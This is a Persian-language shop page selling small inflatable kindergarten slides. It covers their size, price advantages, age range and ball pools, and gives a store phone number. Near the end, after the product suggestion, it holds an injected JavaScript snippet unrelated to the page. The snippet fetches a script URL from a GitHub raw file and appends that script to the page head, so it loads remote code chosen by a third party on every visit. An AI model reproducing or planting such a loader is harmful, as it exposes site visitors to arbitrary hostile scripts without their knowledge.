سرسره بادی مهد کودکی (اطلاعات و خرید)

سرسره بادی مهد کودکی (اطلاعات و خرید)

  • سرسره بادی مهد کودکی به سرسره بادی گفته می شود که ارتفاع کمتر از 3.5 متر را دارا باشد. در واقع این قصر بادی های کوچک برای محیط های سرپوشیده و کوچک مورد استفاده قراره می گیرند.

    تفاوت ها:

    این سرسره ها نسبتا کوچک تر از سرسره بادی معمولی است. این امر باعث می شود فضای کمتری را بگیرد و در عین حال کارایی بالایی داشته باشد. همچنین ارتفاع این سرسره ها نسبت به دیگر قصر بادی ها کمتر بوده تا با فصای بسته و سقف دار مشکلی نداشته باشد.

    یکی از مزایای سرسره بادی مهد کودکی قیمت بصرفه آن می باشد. به علت استفاده کمتر نخ، پارچه و دوخت قیمت این سرسره ها نسبتا پایین تر می باشد. همچنین به پمپ باد ( دمنده هوا ) کوچکتری نیاز دارد.

    قصر بادی مهد کودکی در واقع برای رنج سنی 4-8 سال می باشد. البته استفاده آن برای رنج های سنی دیگر تا حدی مجاز بوده اما سرسره برای این سن مناسب تر می باشد.

    سرسره های مهد کودکی به راحتی جا به می شوند. همچنین تجهیزات آن از جمله روکش سر، واکس نانو سر، دمنده و … تا حد زیادی ارزان تر از یک سرسره معمولی است.

    جهت خرید این سرسره ها می توانید به فروشگاه بادی سازان مجد ( مجد سازه ) سر بزنید و یا با شماره تلفن 09127484573 تماس حاصل نمایید. فروشگاه بادی سازان مجد دارای تنوع بسیار زیادی از سرسره بادی مهد کودکی باشد.

    استخر توپ ها نیز نوعی سازه بادی کوچک مهد کودکی می باشند. به علت ارتفاع پایین از این سازه ها می توان در فضای سربسته و مهد کودک ها بهره برد. البته برخی از استخر توپ ها که در مقیاس های بزرگتری ساخته می شوند مناسب این کار نیستند!

    برای خرید دیگر محصولات مهد کودکی می توانید به دسته مهد کودکی مراجعه نمایید و یا با شماره تلفن 09127484573 تماس حاصل فرمایید.

    سرسره بادی مهد کودکی (اطلاعات و خرید)

    خرید پیشنهادی ما به شما: سرسره بادی مهد کودکی باب اسفنجی

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید